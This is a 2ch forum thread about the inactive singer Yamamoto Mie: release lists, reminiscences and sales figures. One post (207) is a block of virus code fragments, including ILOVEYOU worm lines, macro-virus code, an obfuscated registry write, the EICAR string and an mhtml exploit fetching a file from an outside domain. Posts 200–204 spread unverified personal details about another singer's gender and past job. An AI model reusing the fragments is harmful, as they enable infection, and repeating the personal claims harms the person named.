X



【やっぱり好きさ】山本美絵【情念系】
0001情念名無し
垢版 |
2005/05/09(月) 23:30:29ID:pCPqeuK9
又々落ちてしまったようなので、立ててみた。
0171名無しの歌姫
垢版 |
2006/03/05(日) 12:41:04ID:C53Bk84L
Single
3/08 元ちとせ、Rie fu
3/15 Angela Aki、我那覇美奈(カバー)
3/22 川江美奈子、関口由紀、松たか子
3/24 玲葉奈
3/29 植村花菜(カバー)
4/05 Salyu
4/12 大山百合香
4/19 上原あずみ、柴田淳、榎本くるみ、as
4/26 松千
5/03 元ちとせ

Album
3/08 久嶋美さち
3/15 GO!GO!7188(Best)、小島麻由美、angela、CORE OF SOUL(Best)
3/23 山本サヤカ(ミニ)
3/24 Rie fu
3/29 伴都美子
4/19 Cry&Feel It
4/26 ナナムジカ、小松未歩、松たか子、鳳山雅姫、我那覇美奈
5/03 比屋定篤子(Live)
5/24 東真紀
0172名無しの歌姫
垢版 |
2006/03/09(木) 10:34:48ID:ZxjErskD
http://www.ikimonogakari.com/

最近CMで流れててこっち路線かなと思ったのだが・・・。
HP見る限りなんかちょっと違うのかな。
0173名無しの歌姫
垢版 |
2006/03/13(月) 19:03:45ID:j/YPDWIp
山本美絵スレあったなんてびっくりだ
もう活動休止してから3年以上たってるのか…
0175名無しの歌姫
垢版 |
2006/03/23(木) 21:55:38ID:0iwEmOqy
Single
5/24 Cocco、熊木杏里

Album
5/17 小谷美紗子
5/31 川江美奈子
6/07 陰陽座
0176名無しの歌姫
垢版 |
2006/03/26(日) 16:28:28ID:HR7snB/w
5月にCocco新譜だすの?ハイペースだな。
0177名無しの歌姫
垢版 |
2006/03/30(木) 01:33:56ID:wAeoRkBr
Single
5/10 絢香
5/31 Angela Aki、いきものがかり
6/07 YUI

Album
5/10 遊佐未森
5/24 坂本美雨
6/14 Angela Aki
0178名無しの歌姫
垢版 |
2006/03/32(土) 22:09:20ID:POTq/iHA
Single
5/24 ナナムジカ
5/31 つきよみ
6/07 伴都美子

Album
6/14 Keito Blow
6/28 Rin'
0179名無しの歌姫
垢版 |
2006/04/04(火) 00:17:16ID:4iPEaXFo
Single
5/31 天野月子(5枚同時)

5枚同時発売って・・・
よくポニキャが許したな。
0181名無しの歌姫
垢版 |
2006/04/18(火) 13:47:34ID:BN/5cZd9
age
0182名無しの歌姫
垢版 |
2006/04/19(水) 22:45:05ID:BldMY0sU
最近は矢野絢子と長谷川都だなぁ。
0184名無しの歌姫
垢版 |
2006/05/02(火) 00:41:20ID:SgBcjx4U
このスレで名前が挙がっている中では、
柴田淳、奥田美和子、拝郷メイコ、安藤裕子、倉橋ヨエコ、諌山実生、
関口由紀、奥華子、山本美絵、小島麻由美、ハイポジ、ジムノペディ、
奥村愛子、笹川美和、マキ凛花、矢野絢子、林明日香、湯川潮音、
遊佐未森、熊木杏里、中島みゆき、山崎ハコ、五輪真弓、中山ラビ、
佐井好子、森田童子、金延幸子、谷山浩子、浅川マキ、渚ようこ、
橘いずみ、JANIS JOPLIN、中森明菜、ちあきなおみ、EE JUMP
あたりが好きです。
0186名無しの歌姫
垢版 |
2006/05/03(水) 11:23:58ID:/TrKiZRT
age
0187名無しの歌姫
垢版 |
2006/05/13(土) 15:51:23ID:qtnm3CgB
Single
6/07 手嶌葵
6/28 中村中、LOVE PSYCHEDELICO
7/05 安藤裕子、荘野ジュリ、GARNET CROW
7/12 奥華子

Album
6/14 湯川潮音(ミニ)
7/05 伊禮麻乃
7/12 北出菜奈、手嶌葵
0188名無しの歌姫
垢版 |
2006/05/13(土) 20:28:23ID:g7AcWBoQ
6/21 高鈴
もな。
0189名無しの歌姫
垢版 |
2006/05/14(日) 20:53:54ID:8kOY9Wc4
>>187
6/28 中村中
http://www.nakamura-ataru.jp/

奥村愛子とかの系統なのかな?
それにしてもこのジャケ写・・・
0190名無しの歌姫
垢版 |
2006/05/17(水) 22:41:13ID:oCIg/nTQ
名前から何から狙いすぎですね。
0191名無しの歌姫
垢版 |
2006/05/19(金) 01:30:40ID:K/a66K+a
前スレ1がいなくなって1年経ってしまった
0192名無しの歌姫
垢版 |
2006/05/23(火) 22:11:19ID:Xsc7r6cx
前スレ1よ・・・。Coccoアルバム出すぞ・・・。
帰ってきぃ。
0193名無しの歌姫
垢版 |
2006/05/24(水) 01:06:53ID:E+mHiC0J
洋楽も聴く人には、BelezaのSeven Daysをおすすめします
サウンド的にオナモミの完成形
てか、これのパクり?
0194名無しの歌姫
垢版 |
2006/05/29(月) 05:49:19ID:HQE/7h3f
前スレ1さんの日記は去年の4/3以来更新されていない。
ひょっこり戻ってきてくれないかなぁ...
0195名無しの歌姫
垢版 |
2006/05/29(月) 11:16:15ID:5E1LyutY
たまに見る。
ttp://www.barks.jp/watch/?id=52014018&wpl=wm&wbw=300k
0196名無しの歌姫
垢版 |
2006/06/07(水) 14:24:14ID:maUKLyPy
捕手
0197名無しの歌姫
垢版 |
2006/06/12(月) 02:05:12ID:ZeA7Xo3j
しかし女性ソロミュージシャンは次から次へと出てくるな
その中でメジャーでやっていけるのは少ないんだろうけど
0198名無しの歌姫
垢版 |
2006/06/17(土) 22:54:15ID:vg50G9FT
Single
7/19 榎本くるみ、Rie fu
7/26 奥田美和子、柴田淳
8/02 清心
8/09 柴咲コウ
8/23 田野崎文、中村中
8/30 笹川美和、諌山実生

Album
7/26 倉橋ヨエコ(ミニ)
8/18 松崎ナオ
0199名無しの歌姫
垢版 |
2006/06/17(土) 23:04:41ID:vg50G9FT
Album
8/04 二階堂和美
0200名無しの歌姫
垢版 |
2006/06/22(木) 01:56:37ID:Mz3RcpeP
中村中さんて、男性ですよ。
性同一性障害って言うのかな?

http://www.after.co.jp/club/other/hige/
こちらのひげガールさん(オカマバー)で、『ちゅん』て源氏名で働いていましたよ。

何年か前は普通の男の子って感じだったけど、随分変わりましたね。
0201名無しの歌姫
垢版 |
2006/06/22(木) 02:09:50ID:P/kY5Mo9
プロフィールだと高校出て2年しかたってないように見えるのだが・・・。
そんな人が何年か前にオカマバーに勤めたりしないでしょ。
親と一緒に住んでるみたいだし。
0202名無しの歌姫
垢版 |
2006/06/22(木) 22:45:26ID:JFXEEbMH
でも検索すると男だって情報もちらほら出てくるね。
KAB.だって女性扱いだから
やっぱりこの人は男性として扱うべきなのかな?
0203名無しの歌姫
垢版 |
2006/06/23(金) 01:29:32ID:F9y7uMt5
ひげガールさんに勤めていたのは、一昨年ですよ。
高校は、中退してしまったそうです。
今のHP『恋愛中毒』の前に『中毒』と言うHPをされていたのですが、
そちらでは色々とご自分の事を書かれていて、女性が心の底から憎い、
自分は体は男性だと書かれていました。
『中毒』は日記があまりに赤裸々だった為か
(親や人に対して、死ね!とか、そう言う言葉がよく使われていました)
デビュー前に消されてしまいました。
ご自分の後姿のヌード写真も、公開されていました。
背中には金魚のタトゥーと、背中一面に
『花の色は移りにけりないたづらに わが身世にふるながめせしまに』
と、彫られていました。
0204名無しの歌姫
垢版 |
2006/06/23(金) 03:17:13ID:F9y7uMt5
>201

↑(200)のひげガールの在籍キャストの、上から9列目を見て下さい。

『ちゅん』と言う方が、中村中さんです。
源氏名『ちゅん』は、中(あたる)と言う字が
麻雀牌で中(ちゅん)と読むからこう付けられたそうです。
0205名無しの歌姫
垢版 |
2006/06/25(日) 20:27:41ID:zc3oAmFp
age
0206名無しの歌姫
垢版 |
2006/07/06(木) 21:36:56ID:uldIWhFy
あげ
0207名無しの歌姫
垢版 |
2006/07/06(木) 22:56:45ID:qmsxwSG2
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
0208名無しの歌姫
垢版 |
2006/07/07(金) 13:19:48ID:GKBwV/OL
猫大好き
0209名無しの歌姫
垢版 |
2006/07/11(火) 00:55:17ID:iOsnjUGl
0210名無しの歌姫
垢版 |
2006/07/11(火) 01:06:55ID:NFCv/O9Z
山本美絵さんの曲は聴いた事ないのですが2001年〜2002年頃の音楽雑誌に載ってるのを見て気になってました。
この人は今も活動しているのでしょうか?CDを検索したら昔の作品しかなかったので…。
0211名無しの歌姫
垢版 |
2006/07/11(火) 18:35:05ID:RyGDZiOb
今はお休み中
0212名無しの歌姫
垢版 |
2006/07/12(水) 01:23:15ID:MnhCtkxr
今は活動休止してるのですね…。理由は公表されているのでしょうか?
それと鬼束ちひろも好きなんですが、鬼束も今は活動休止してるので寂しいです…。
最近好きになったCoccoは復帰しましたし、美絵さんも鬼束も復帰して欲しいです(>_<)
0213名無しの歌姫
垢版 |
2006/07/13(木) 01:22:40ID:oowOToop
理由は不明。CDの売り上げが不振で、
これで最後ね、ってことでタイアップだのコラボだのされたミニアルバムも売れず、
事務所に首を切られたというまことしやかな噂がある位かな。

とりあえず分かっていること。
・完全な行方不明。
0214名無しの歌姫
垢版 |
2006/07/13(木) 01:52:29ID:pI7L6K2/
ジオラマチって出荷店舗も絞られてたし
ほとんどインディーズCDみたいな感じだったんで
これで売れなくて切られたってのは悲しい話だよね。

そういえば、takeimaiはどこへ?と思ったら
こっちも2001年以降の情報が全然ない。

二人で結婚してアメリカにでも住んでるのかな。
0215名無しの歌姫
垢版 |
2006/07/14(金) 19:54:16ID:0HTMBJo5
確かに、ジオラマチは実物見たこと無いな・・・。
takeimai氏って男?何となく女だと思ってたww
reiharakamiも女と思いきや男なんだよね、確か。
0216名無しの歌姫
垢版 |
2006/07/14(金) 20:42:33ID:YVaaGNe+
「竹井麻衣」みたいな感じかw
確かにそうも読めるな。
でも「タケ今井」なんだよな。本名はタケヒコとかなんだろうな。
どっかで似顔絵見た記憶がある。ヒゲにギョロ目の濃い顔だった。
0217名無しの歌姫
垢版 |
2006/07/14(金) 21:12:30ID:0HTMBJo5
>タケ今井
まぢでかー。ずっと舞さんかと思ってたから、ちょっとびっくりだw
で、今無性に懐かしくなって、マキシのカゲロウを尼で注文しちまったぃwww
実はオナモミまでしか揃えてないんだよね。
0218名無しの歌姫
垢版 |
2006/07/15(土) 17:31:24ID:V42qqww/
ジオラマチ見た事ないなぁ
0219名無しの歌姫
垢版 |
2006/07/21(金) 11:12:38ID:uXutqcNC
http://www.kamitamika.com/disco.html

この人がこういう化けかたするとは思わなかった。
「春紅」って曲はKOKIAっぽいし、「まっすぐに」はさらに民謡系。
歌わされてる感はあるし、これだけ今までと違う楽曲を出しちゃうと
アルバム出すときとかどうするんだろうって思うけど、いい声だ。
0220名無しの歌姫
垢版 |
2006/08/02(水) 22:10:18ID:KRxtffgR
美絵さんは雑誌には良く出ていました。CDを買わなくとも名前だけ知ってる人は多そうかなぁって思います。CDの売り上げ不振との事ですが実際は何万枚売れてたのですか?
0221名無しの歌姫
垢版 |
2006/08/02(水) 22:23:29ID:WpKG1Xpi
>>220
売り上げ枚数は知らないが、万枚というほど売れてないんじゃない?

最後のCD出してまもなくやめちゃったので売り上げ
不振でカットされたってわけではなさそう。
0222名無しの歌姫
垢版 |
2006/08/03(木) 18:24:44ID:WphOH0To
今は何してるのかなぁ
0224名無しの歌姫
垢版 |
2006/08/06(日) 21:24:26ID:KLSc2PW6
うわー、こんなスレあるんだ。すごく懐かしい!
山本美絵大好きだったけど、カマキリ?の出てくる歌は未だにトラウマだw
ジオラマチも好きだったのに、弟が中身だけなくしやがったから、もう聞けない(´・ω・`)
0225名無しの歌姫
垢版 |
2006/08/09(水) 19:57:37ID:s6gNk3z0
カマキリ出てくる歌ってなんの曲だっけ?

忘れちゃったよ あはは
0227名無しの歌姫
垢版 |
2006/08/10(木) 02:56:49ID:UVaDVKOE
泣いてやるうううぅぅぅぅぅぅうぅぅぅぅぅううぅぅぅぅぅ!!!!!
0229名無しの歌姫
垢版 |
2006/08/26(土) 00:44:53ID:jaFA6oR6

0230名無しの歌姫
垢版 |
2006/09/01(金) 20:11:52ID:J3eos62I
お聞きしたいんですが。

美絵嬢の着うたがあるサイトってありますか?

いくら自分で探してもなくって・・・orz
0232名無しの歌姫
垢版 |
2006/09/07(木) 00:48:21ID:fdk0+uxg
>>230
自分で作った方が早いかと・・・。
0233名無しの歌姫
垢版 |
2006/09/12(火) 18:25:16ID:iQuGr6Am
中村さんカミングアウトしたみたいね。
ttp://news18.2ch.net/test/read.cgi/mnewsplus/1157929042/
0234名無しの歌姫
垢版 |
2006/09/14(木) 02:38:19ID:GGogzam2
>>106
0235名無しの歌姫
垢版 |
2006/09/14(木) 03:33:59ID:h7aAmfDQ
うわ・・・懐かしい名前だ
このスレあがってなかったら間違いない存在を思い出す事はなかったね

一曲好きな曲あったけどタイトルとか忘れたな・・・4年くらい前だった気がする
今携帯からでPC立ち上げるのめんどくさいから明日PC立ち上げたらついでにぐぐってみよ

自分もあげとこう
0236名無しの歌姫
垢版 |
2006/09/14(木) 14:14:32ID:m9NULONa
きっとみんな(含俺)暇しててネタに餓えてるから、
歌詞の一部でも書いてくれればタイトル答えるよw
0237名無しの歌姫
垢版 |
2006/09/14(木) 18:44:00ID:h7aAmfDQ
それが歌詞すら覚えてないw
今晩ぐぐってみるよ〜
とにかく暗いイメージがあったなぁ
0238名無しの歌姫
垢版 |
2006/09/15(金) 01:26:51ID:KcUxhU2O
>とにかく暗いイメージ
美絵さんの曲はある意味全部そんな感じなので参考にならないのです。。。

多分初期シングル3枚のうちどれかとは思うんだけど。
0239238
垢版 |
2006/09/15(金) 21:02:49ID:rzDNA9Oe
ぐぐって思い出しました!!
カゲロフです!!
ちなみに猫って曲もしってます!
スペシャでよく流れてたなぁ

・・・てかオフィシャルないのね・・・
久しぶりにカゲロフ聴きたい・・・
0240239携帯
垢版 |
2006/09/15(金) 21:28:23ID:aF7Cw8FF
今レンタル屋きた〜
オナモミってアルバムがあったけどカゲフロ入ってない・・・・


てかなんかエッチぃねw
0241名無しの歌姫
垢版 |
2006/09/15(金) 22:12:54ID:KcUxhU2O
カゲロフはシングルのみだからねぇ。
オナモミは1stアルバムで、この後にカゲロウがリリースされたのです。
エッチぃというよりも、生々しいかなww

なにせコピーが「狂気のトラウマ系歌手」ですからwww
0242238
垢版 |
2006/09/15(金) 23:41:10ID:rzDNA9Oe
>>241
ワロタwww
そのキャッチコピーはまり過ぎwww

シングルのみなんだね。
今ヤフオクとモバオク見たけどカゲロフなかった・・・
でもアマゾンに中古があるみたいだから買おうかな〜

ちなみにアルバムの出来はどうですか?
カゲロフが無くショックでそのまま店を出てしまったけど良かったら借りようかな。
ヤフオクで未開封も売ってたしそれ買うのもいいかも!
0243名無しの歌姫
垢版 |
2006/09/16(土) 00:04:36ID:rZC1X50f
カゲロフとオナモミはかなり曲の路線は違います。
カゲロフはもともとドラマのタイアップの話が来て
ラブソングを作れという事務所の命令のもとに作られた曲なので。
オナモミは打ち込みヒップホップもどきのサウンドに
これでもかというくらいのネガで暗い歌詞が載ってます。
気分は一瞬でどん底ですw
0244名無しの歌姫
垢版 |
2006/09/16(土) 13:07:53ID:HWblU+qP
ワロスwww
どん底いいね。
でもジオラマチは置いてる店ないんだよなぁ…。前に見かけた店でももうないし、近所のTSUTAYAはオナモミしかないし。
聴いてみたい…
0245242
垢版 |
2006/09/16(土) 17:39:41ID:a8dvk8OA
>>243
打ち込み系ですかw
てことはオナモミ路線が本来の山本美絵さんなのかな?

それにしても詩が気になるw
確かにカゲロフの詩もとことん暗かった気が・・・
アルバム今度借りてみます!
0246名無しの歌姫
垢版 |
2006/09/16(土) 20:36:16ID:bTRO23I6
元々他の曲でアレンジしているtakeimai氏はクラブ畑の人だからねー。
合う合わないがあるかも。
0247名無しの歌姫
垢版 |
2006/09/17(日) 00:22:41ID:1WSDmP+2
クラブミュージックとかは嫌いじゃないですね
でも山本美絵さんの暗い詩にどうハマるのかが気になるw

よし!アルバムレンタルしてみます!
その前に中古だけどアマゾンでカゲロフあったから買います!
ジャケットとか見て『うわ・・・めっちゃ暗っっ!!』って思ったのを覚えてますw
0248名無しの歌姫
垢版 |
2006/09/17(日) 00:37:38ID:0mryPNqd
え?カゲロフは山本さんの曲の中ではいちばん明るい曲だよ?w
0249名無しの歌姫
垢版 |
2006/09/22(金) 22:48:14ID:391paAIj
ウホっ!
0250名無しの歌姫
垢版 |
2006/09/23(土) 17:23:20ID:5omDdqK3
カップリングのかげろうのほうが好き
0251名無しの歌姫
垢版 |
2006/09/23(土) 22:05:07ID:PYQzPHdx
福岡でラジオ聴いてた…
暗い。暗いよ…

でもさ、暗い歌詞書く人でも、最後は何となく救いと言うか逃げ道作りがちじゃない?
山本みえにはそういう嘘臭さがないから好き。
0252名無しの歌姫
垢版 |
2006/09/23(土) 23:19:48ID:J2H6xMbR
山本美絵はどこまでも絶望で終わるよねw

あと、彼女はラジオでもぼそぼそネクラな感じのしゃべり方で、妙に納得した覚えがあるw
オフィの日記は結構面白かったけどねー
0253名無しの歌姫
垢版 |
2006/09/23(土) 23:25:20ID:PYQzPHdx
今は全く活動なし?
0254名無しの歌姫
垢版 |
2006/09/24(日) 00:58:37ID:n9kbpXKH
>>253
なし。活動どころか長らく完全に行方不明なのですよこの方。
0255名無しの歌姫
垢版 |
2006/09/24(日) 01:31:52ID:ZXPxb0Im
行方不明!

何だかもったいないなあ…
暗いままでいる稀有な存在だったのに。所詮明るさなんか逃げさ。
0256名無しの歌姫
垢版 |
2006/09/24(日) 22:19:07ID:wnjU+2QX
カゲロフの無料ライブ、前から2番目の正面の席で見てたけど、予想以上に美人だったからか今もものすごい記憶に残ってるよ。
あとマジックミラーとマネキンが良かった
0257名無しの歌姫
垢版 |
2006/09/30(土) 17:45:41ID:48mx8DoD
美絵嬢は美人だよね。
小沢真珠に似てると思った。
0258名無しの歌姫
垢版 |
2006/09/30(土) 19:52:44ID:BhNgPqV9
この人横浜中華街で雑貨屋経営してる人だよね〜
0259名無しの歌姫
垢版 |
2006/09/30(土) 20:54:30ID:48mx8DoD
山口美江・・・orz
みえ違い・・・orz
0260名無しの歌姫
垢版 |
2006/10/02(月) 21:46:01ID:9wH61P/c
今日カゲロフをカラオケで唄いました
0261名無しの歌姫
垢版 |
2006/10/03(火) 16:53:25ID:uW2JAR/G
>>259
よくわかったな
ほんとに経営してるかと思った
0262名無しの歌姫
垢版 |
2006/10/06(金) 01:50:15ID:8Km8NJsN
新曲発売
0263名無しの歌姫
垢版 |
2006/10/06(金) 02:24:03ID:g5zh7tDk
・・・へんじがない。ただのしかばねのようだ。






新曲!!!???
   ∧∧
  ( ・ω・)  ガバッ! 
  _| ⊃/(___ 
/ └-(____/ 
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
0264名無しの歌姫
垢版 |
2006/10/09(月) 08:23:28ID:jmgtKukm
新曲?
ソースよろ
0267名無しの歌姫
垢版 |
2006/11/03(金) 00:21:17ID:wmoQz81s
数日前に東野こうじが司会してる歌うたいオーディション番組みたいなので最終プレゼンに進んだ女の人の歌ってた曲、
ちょっと美絵嬢っぽくて良かったな。デビュー出来なかったのは残念。
誰か見てた人いる?
0268名無しの歌姫
垢版 |
2006/12/06(水) 04:58:31ID:ADxtlcUs
age
0269青紀マニア
垢版 |
2007/01/03(水) 16:23:11ID:EmxlB3/W
オリコン関係者に聞いた山本氏の売り上げ

カーネル 100位圏外で初動402枚 総計売り上げ1629枚
○○ゴッコ。 100位圏外で初動795枚 総計売り上げ1407枚
猫 100位圏外で初動811枚 総計売り上げ2461枚
カゲロフ 100位圏外で初動517枚 総計売り上げ1182枚

オナモミ 100位圏外 初動1044枚 総計売り上げ3519枚
ジオラマチ 100位圏外 初動712枚 総計売り上げ996枚
レスを投稿する


ニューススポーツなんでも実況